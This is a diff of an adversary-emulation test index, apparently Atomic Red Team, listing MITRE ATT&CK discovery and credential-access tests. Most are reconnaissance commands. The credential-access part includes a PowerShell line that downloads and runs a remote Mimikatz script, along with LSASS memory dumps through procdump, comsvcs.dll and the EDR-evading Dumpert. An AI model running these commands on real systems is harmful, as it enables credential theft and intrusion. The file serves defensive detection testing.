- name: Enumerate users and groups
|
|
|
|
|
description: 'Utilize local utilities to enumerate users and groups
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -16824,7 +16835,7 @@ discovery:
|
|
|
|
|
- name: Enumerate all accounts via PowerShell
|
|
|
|
|
description: 'Enumerate all accounts via PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -16845,7 +16856,7 @@ discovery:
|
|
|
|
|
- name: Enumerate logged on users
|
|
|
|
|
description: 'Enumerate logged on users
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -16853,11 +16864,11 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'query user
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Enumerate logged on users via PowerShell
|
|
|
|
|
description: 'Enumerate logged on users via PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -16865,7 +16876,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'query user
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1010:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -16934,7 +16945,7 @@ discovery:
|
|
|
|
|
#{output_file_name}
|
|
|
|
|
cleanup_command: 'del /f /q /s #{output_file_name} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1217:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -16982,7 +16993,7 @@ discovery:
|
|
|
|
|
description: 'Searches for Mozilla Firefox''s places.sqlite file (on Linux distributions)
|
|
|
|
|
that contains bookmarks and lists any found instances to a text file.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -16990,12 +17001,12 @@ discovery:
|
|
|
|
|
command: 'find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >>
|
|
|
|
|
/tmp/firefox-bookmarks.txt \;
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: List Mozilla Firefox Bookmark Database Files on macOS
|
|
|
|
|
description: 'Searches for Mozilla Firefox''s places.sqlite file (on macOS)
|
|
|
|
|
that contains bookmarks and lists any found instances to a text file.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -17003,12 +17014,12 @@ discovery:
|
|
|
|
|
command: 'find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {}
|
|
|
|
|
>> /tmp/firefox-bookmarks.txt \;
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: List Google Chrome Bookmark JSON Files on macOS
|
|
|
|
|
description: 'Searches for Google Chrome''s Bookmark file (on macOS) that contains
|
|
|
|
|
bookmarks in JSON format and lists any found instances to a text file.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -17016,31 +17027,31 @@ discovery:
|
|
|
|
|
command: 'find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> /tmp/chrome-bookmarks.txt
|
|
|
|
|
\;
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: List Google Chrome Bookmarks on Windows with powershell
|
|
|
|
|
description: 'Searches for Google Chromes''s Bookmarks file (on Windows distributions)
|
|
|
|
|
that contains bookmarks.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: powershell
|
|
|
|
|
command: 'where.exe /R C:\Users\ Bookmarks
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: List Google Chrome Bookmarks on Windows with command prompt
|
|
|
|
|
description: 'Searches for Google Chromes''s Bookmarks file (on Windows distributions)
|
|
|
|
|
that contains bookmarks.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'where /R C:\Users\ Bookmarks
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
'':
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -17117,7 +17128,7 @@ discovery:
|
|
|
|
|
or perform other forms of [Discovery](https://attack.mitre.org/tactics/TA0007),
|
|
|
|
|
especially in a short period of time, may aid in detection.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
|
|
|
|
x_mitre_contributors:
|
|
|
|
|
- Sunny Neo
|
|
|
|
@@ -17245,7 +17256,7 @@ discovery:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'dsquery * -filter "(objectClass=trustedDomain)" -attr *
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows - Discover domain trusts with nltest
|
|
|
|
|
description: |
|
|
|
|
|
Uses the nltest command to discover domain trusts.
|
|
|
|
@@ -17257,11 +17268,11 @@ discovery:
|
|
|
|
|
name: command_prompt
|
|
|
|
|
command: 'nltest /domain_trusts
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Powershell enumerate domains and forests
|
|
|
|
|
description: 'Use powershell to enumerate AD information
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -17326,9 +17337,9 @@ discovery:
|
|
|
|
|
identifier: T1083
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: File and Directory Discovery (cmd.exe)
|
|
|
|
|
description: 'Find or discover files on the file system
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of
|
|
|
|
|
all of the data discovery commands.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -17338,15 +17349,15 @@ discovery:
|
|
|
|
|
dir /s c:\ >> %temp%\download
|
|
|
|
|
dir /s "c:\Documents and Settings" >> %temp%\download
|
|
|
|
|
dir /s "c:\Program Files\" >> %temp%\download
|
|
|
|
|
dir /s d:\ >> %temp%\download
|
|
|
|
|
dir "%systemdrive%\Users\*.*" >> %temp%\download
|
|
|
|
|
dir "%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\*.*" >> %temp%\download
|
|
|
|
|
dir "%userprofile%\Desktop\*.*" >> %temp%\download
|
|
|
|
|
tree /F >> %temp%\download
|
|
|
|
|
- name: File and Directory Discovery (PowerShell)
|
|
|
|
|
description: 'Find or discover files on the file system
|
|
|
|
|
description: 'Find or discover files on the file system. Upon execution, file
|
|
|
|
|
and folder information will be displayed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -17381,7 +17392,7 @@ discovery:
|
|
|
|
|
- name: Nix File and Directory Discovery 2
|
|
|
|
|
description: 'Find or discover files on the file system
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -17570,7 +17581,7 @@ discovery:
|
|
|
|
|
- name: Network Share Discovery
|
|
|
|
|
description: 'Network Share Discovery
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -17601,7 +17612,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net view \\#{computer_name}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Network Share Discovery PowerShell
|
|
|
|
|
description: |
|
|
|
|
|
Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host
|
|
|
|
@@ -17630,7 +17641,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net share
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1040:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -17821,19 +17832,19 @@ discovery:
|
|
|
|
|
- name: Examine password complexity policy - Ubuntu
|
|
|
|
|
description: 'Lists the password complexity policy to console on Ubuntu Linux.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'cat /etc/pam.d/common-password
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Examine password complexity policy - CentOS/RHEL 7.x
|
|
|
|
|
description: 'Lists the password complexity policy to console on CentOS/RHEL
|
|
|
|
|
7.x Linux.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
dependencies:
|
|
|
|
@@ -17845,12 +17856,12 @@ discovery:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'cat /etc/security/pwquality.conf
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Examine password complexity policy - CentOS/RHEL 6.x
|
|
|
|
|
description: 'Lists the password complexity policy to console on CentOS/RHEL
|
|
|
|
|
6.x Linux.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
dependencies:
|
|
|
|
@@ -17866,18 +17877,18 @@ discovery:
|
|
|
|
|
- name: Examine password expiration policy - All Linux
|
|
|
|
|
description: 'Lists the password expiration policy to console on CentOS/RHEL/Ubuntu.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
|
name: bash
|
|
|
|
|
command: 'cat /etc/login.defs
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Examine local password policy - Windows
|
|
|
|
|
description: 'Lists the local password policy to console on Windows.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -17885,11 +17896,11 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net accounts
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Examine domain password policy - Windows
|
|
|
|
|
description: 'Lists the domain password policy to console on Windows.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -17897,11 +17908,11 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net accounts /domain
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Examine password policy - macOS
|
|
|
|
|
description: 'Lists the password policy to console on macOS.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
executor:
|
|
|
|
@@ -17983,7 +17994,7 @@ discovery:
|
|
|
|
|
- name: Permission Groups Discovery
|
|
|
|
|
description: 'Permission Groups Discovery
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- macos
|
|
|
|
|
- linux
|
|
|
|
@@ -17994,9 +18005,9 @@ discovery:
|
|
|
|
|
dscl . -list /Groups
|
|
|
|
|
groups
|
|
|
|
|
- name: Basic Permission Groups Discovery Windows
|
|
|
|
|
description: 'Basic Permission Groups Discovery for Windows
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
|
|
|
|
|
information will be displayed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18007,9 +18018,9 @@ discovery:
|
|
|
|
|
net group /domain
|
|
|
|
|
net group "domain admins" /domain
|
|
|
|
|
- name: Permission Groups Discovery PowerShell
|
|
|
|
|
description: 'Permission Groups Discovery utilizing PowerShell
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Permission Groups Discovery utilizing PowerShell. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain
|
|
|
|
|
information will be displayed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -18024,10 +18035,9 @@ discovery:
|
|
|
|
|
get-localgroup
|
|
|
|
|
get-ADPrincipalGroupMembership #{user} | select name
|
|
|
|
|
- name: Elevated group enumeration using net group
|
|
|
|
|
description: 'Runs "net group" command including command aliases and loose typing
|
|
|
|
|
to simulate enumeration/discovery of high value domain groups
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
description: |
|
|
|
|
|
Runs "net group" command including command aliases and loose typing to simulate enumeration/discovery of high value domain groups. This
|
|
|
|
|
test will display some errors if run on a computer not connected to a domain. Upon execution, domain information will be displayed.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18116,7 +18126,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'tasklist
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1012:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -18302,7 +18312,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net group "Domain Computers" /domain
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remote System Discovery - nltest
|
|
|
|
|
description: |
|
|
|
|
|
Identify domain controllers for specified domain.
|
|
|
|
@@ -18320,7 +18330,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'nltest.exe /dclist:#{target_domain}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remote System Discovery - ping sweep
|
|
|
|
|
description: |
|
|
|
|
|
Identify remote systems via ping sweep.
|
|
|
|
@@ -18333,7 +18343,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remote System Discovery - arp
|
|
|
|
|
description: "Identify remote systems via arp. \n\nUpon successful execution,
|
|
|
|
|
cmd.exe will execute arp to list out the arp cache. Output will be via stdout.\n"
|
|
|
|
@@ -18344,7 +18354,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'arp -a
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remote System Discovery - arp nix
|
|
|
|
|
description: |
|
|
|
|
|
Identify remote systems via arp.
|
|
|
|
@@ -18358,7 +18368,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'arp -a | grep -v ''^?''
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remote System Discovery - sweep
|
|
|
|
|
description: "Identify remote systems via ping sweep.\n\nUpon successful execution,
|
|
|
|
|
sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if
|
|
|
|
@@ -18372,7 +18382,7 @@ discovery:
|
|
|
|
|
command: 'for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ]
|
|
|
|
|
&& echo "192.168.1.$ip UP" || : ; done
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Remote System Discovery - nslookup
|
|
|
|
|
description: "Powershell script that runs nslookup on cmd.exe against the local
|
|
|
|
|
/24 network of the first network adaptor listed in ipconfig.\n\nUpon successful
|
|
|
|
@@ -18495,7 +18505,7 @@ discovery:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
command: 'fltmc.exe | findstr.exe 385201
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Security Software Discovery - AV Discovery via WMI
|
|
|
|
|
description: |
|
|
|
|
|
Discovery of installed antivirus products via a WMI query.
|
|
|
|
@@ -18553,7 +18563,7 @@ discovery:
|
|
|
|
|
software that is installed on the system. Adversaries may use the information
|
|
|
|
|
from Software Discovery during automated discovery to shape follow-on behaviors
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18562,13 +18572,13 @@ discovery:
|
|
|
|
|
command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer"
|
|
|
|
|
/v svcVersion
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Applications Installed
|
|
|
|
|
description: 'Adversaries may attempt to get a listing of all software that
|
|
|
|
|
is installed on the system. Adversaries may use the information from Software
|
|
|
|
|
Discovery during automated discovery to shape follow-on behaviors
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18660,7 +18670,7 @@ discovery:
|
|
|
|
|
- name: System Information Discovery
|
|
|
|
|
description: 'Identify System Info
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18672,7 +18682,7 @@ discovery:
|
|
|
|
|
- name: System Information Discovery
|
|
|
|
|
description: 'Identify System Info
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -18685,7 +18695,7 @@ discovery:
|
|
|
|
|
- name: List OS Information
|
|
|
|
|
description: 'Identify System Info
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -18701,7 +18711,7 @@ discovery:
|
|
|
|
|
description: 'Identify virtual machine hardware. This technique is used by the
|
|
|
|
|
Pupy RAT and other malware.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -18719,7 +18729,7 @@ discovery:
|
|
|
|
|
description: 'Identify virtual machine guest kernel modules. This technique
|
|
|
|
|
is used by the Pupy RAT and other malware.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
executor:
|
|
|
|
@@ -18733,7 +18743,7 @@ discovery:
|
|
|
|
|
- name: Hostname Discovery (Windows)
|
|
|
|
|
description: 'Identify system hostname for Windows.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18741,11 +18751,11 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'hostname
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Hostname Discovery
|
|
|
|
|
description: 'Identify system hostname for Linux and macOS systems.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -18754,11 +18764,11 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'hostname
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Windows MachineGUID Discovery
|
|
|
|
|
description: 'Identify the Windows MachineGUID value for a system.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -18767,7 +18777,7 @@ discovery:
|
|
|
|
|
command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v
|
|
|
|
|
MachineGuid
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1016:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -18836,7 +18846,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'netsh advfirewall firewall show rule name=all
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: System Network Configuration Discovery
|
|
|
|
|
description: |
|
|
|
|
|
Identify network configuration information.
|
|
|
|
@@ -18913,7 +18923,7 @@ discovery:
|
|
|
|
|
| Out-File -Encoding ASCII -append $file\nWrite-Host $results\n"
|
|
|
|
|
cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}"
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1049:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -19007,7 +19017,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'Get-NetTCPConnection
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: System Network Connections Discovery Linux & MacOS
|
|
|
|
|
description: |
|
|
|
|
|
Get a listing of network connections.
|
|
|
|
@@ -19186,10 +19196,10 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'net.exe start >> #{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1124:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_data_sources:
|
|
|
|
@@ -19242,9 +19252,10 @@ discovery:
|
|
|
|
|
identifier: T1124
|
|
|
|
|
atomic_tests:
|
|
|
|
|
- name: System Time Discovery
|
|
|
|
|
description: 'Identify the system time
|
|
|
|
|
description: 'Identify the system time. Upon execution, the local computer system
|
|
|
|
|
time and timezone will be displayed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -19259,9 +19270,10 @@ discovery:
|
|
|
|
|
net time \\#{computer_name}
|
|
|
|
|
w32tm /tz
|
|
|
|
|
- name: System Time Discovery - PowerShell
|
|
|
|
|
description: 'Identify the system time via PowerShell
|
|
|
|
|
description: 'Identify the system time via PowerShell. Upon execution, the system
|
|
|
|
|
time will be displayed.
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -19269,7 +19281,7 @@ discovery:
|
|
|
|
|
elevation_required: false
|
|
|
|
|
command: 'Get-Date
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
credential-access:
|
|
|
|
|
T1098:
|
|
|
|
|
technique:
|
|
|
|
@@ -19367,7 +19379,7 @@ credential-access:
|
|
|
|
|
- name: Admin Account Manipulate
|
|
|
|
|
description: 'Manipulate Admin Account Name
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
@@ -19439,7 +19451,7 @@ credential-access:
|
|
|
|
|
description: 'Search through bash history for specifice commands we want to
|
|
|
|
|
capture
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- linux
|
|
|
|
|
- macos
|
|
|
|
@@ -19462,7 +19474,7 @@ credential-access:
|
|
|
|
|
command: 'cat #{bash_history_filename} | grep #{bash_history_grep_args} >
|
|
|
|
|
#{output_file}
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
T1110:
|
|
|
|
|
technique:
|
|
|
|
|
x_mitre_permissions_required:
|
|
|
|
@@ -19565,7 +19577,7 @@ credential-access:
|
|
|
|
|
description: 'Creates username and password files then attempts to brute force
|
|
|
|
|
on remote host
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
@@ -19942,7 +19954,7 @@ credential-access:
|
|
|
|
|
command: 'IEX (New-Object Net.WebClient).DownloadString(''#{remote_script}'');
|
|
|
|
|
Invoke-Mimikatz -DumpCreds
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Gsecdump
|
|
|
|
|
description: "Dump credentials from memory using Gsecdump.\n\nUpon successful
|
|
|
|
|
execution, you should see domain\\username's following by two 32 characters
|
|
|
|
@@ -20050,7 +20062,7 @@ credential-access:
|
|
|
|
|
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
|
|
|
|
|
ProcDump.
|
|
|
|
|
|
|
|
|
|
Upon successful execution, you should see a file the following file created C:\Windows\Temp\lsass_dump.dmp.
|
|
|
|
|
Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp.
|
|
|
|
|
|
|
|
|
|
If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first.
|
|
|
|
|
supported_platforms:
|
|
|
|
@@ -20080,7 +20092,52 @@ credential-access:
|
|
|
|
|
command: "#{procdump_exe} -accepteula -ma lsass.exe #{output_file}\n"
|
|
|
|
|
cleanup_command: 'del "#{output_file}" >nul 2> nul
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
'
|
|
|
|
|
- name: Dump LSASS.exe Memory using comsvcs.dll
|
|
|
|
|
description: |
|
|
|
|
|
The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll.
|
|
|
|
|
|
|
|
|
|
Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp.
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
executor:
|
|
|
|
|
elevation_required: true
|
|
|
|
|
name: powershell
|
|
|
|
|
command: 'C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll,
|
|
|
|
|
MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
cleanup_command: 'Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
|
|
|
|
|
|
|
|
|
|
'
|
|
|
|
|
- name: Dump LSASS.exe Memory using direct system calls and API unhooking
|
|
|
|
|
description: "The memory of lsass.exe is often dumped for offline credential
|
|
|
|
|
theft attacks. This can be achieved using direct system calls and API unhooking
|
|
|
|
|
in an effort to avoid detection. \nhttps://github.com/outflanknl/Dumpert\nhttps://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/\nUpon
|
|
|
|
|
successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp.\n\nIf
|
|
|
|
|
you see a message saying \"The system cannot find the path specified.\", try
|
|
|
|
|
using the get-prereq_commands to download the tool first.\n"
|
|
|
|
|
supported_platforms:
|
|
|
|
|
- windows
|
|
|
|
|
input_arguments:
|
|
|
|
|
dumpert_exe:
|
|
|
|
|
description: Path of Dumpert executable
|
|
|
|
|
type: Path
|
|
|
|
|
default: PathToAtomicsFolder\T1003\bin\Outflank-Dumpert.exe
|
|
|
|
|
dependency_executor_name: powershell
|
|
|
|
|
dependencies:
|
|
|
|
|
- description: Dumpert executable must exist on disk at specified location (#{dumpert_exe})
|
|
|
|
|
prereq_command: 'if (Test-Path #{dumpert_exe}) {exit 0} else {exit 1}'
|
|
|
|
|
get_prereq_command: |-
|
|
|
|
|
New-Item -ItemType Directory (Split-Path #{dumpert_exe}) -Force | Out-Null
|
